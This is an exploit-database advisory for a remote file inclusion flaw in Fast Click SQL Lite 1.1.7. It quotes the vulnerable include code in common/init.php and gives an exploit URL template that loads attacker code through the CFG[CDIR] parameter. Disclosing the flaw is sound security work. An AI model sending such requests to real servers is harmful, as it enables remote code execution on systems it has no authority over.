header-logo
Suggest Exploit
vendor:
Fast Click SQL Lite
by:
NoGe
9.3
CVSS
HIGH
Remote File Inclusion
98
CWE
Product Name: Fast Click SQL Lite
Affected Version From: 1.1.2007
Affected Version To: 1.1.2007
Patch Exists: NO
Related CWE: N/A
CPE: a:ftrsoft:fast_click_sql_lite:1.1.7
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

Fast CLick SQL Lite 1.1.7 Remote File Inclusion Vulnerability

Fast CLick SQL Lite version 1.1.7 is vulnerable to a Remote File Inclusion vulnerability. An attacker can exploit this vulnerability by sending a maliciously crafted HTTP request to the vulnerable server. This request contains a maliciously crafted URL with the vulnerable parameter CFG[CDIR] set to an arbitrary file on the server. This allows an attacker to execute arbitrary code on the vulnerable server.

Mitigation:

The best way to mitigate this vulnerability is to ensure that user input is properly sanitized and validated before being used in a file inclusion operation.
Source

Exploit-DB raw data:

===========================================================================================


  [o] Fast CLick SQL Lite 1.1.7 Remote File Inclusion Vulnerability

       Software : Fast CLick SQL Lite version 1.1.7
       Vendor   : http://www.ftrsoft.com/
       Download : http://www.ftrsoft.com/downloads.html
       Author   : NoGe
       Contact  : noge[at]mainhack[dot]com


===========================================================================================


  [o] Vulnerable file

       common/init.php

	require($CFG['CDIR'].'/global.php'); 
	require($CFG['CDIR'].'/sql.php');



  [o] Exploit

       http://localhost/[path]/common/init.php?CFG[CDIR]=[evilcode]


===========================================================================================


  [o] Greetz

       MainHack BrotherHood [ www.mainhack.com ]
       VOP Crew [ Vaksin13 OoN_BoY Paman ]
       H312Y yooogy mousekill }^-^{ k1tk4t
       skulmatic olibekas ulga Cungkee str0ke

        
===========================================================================================

# milw0rm.com [2008-10-19]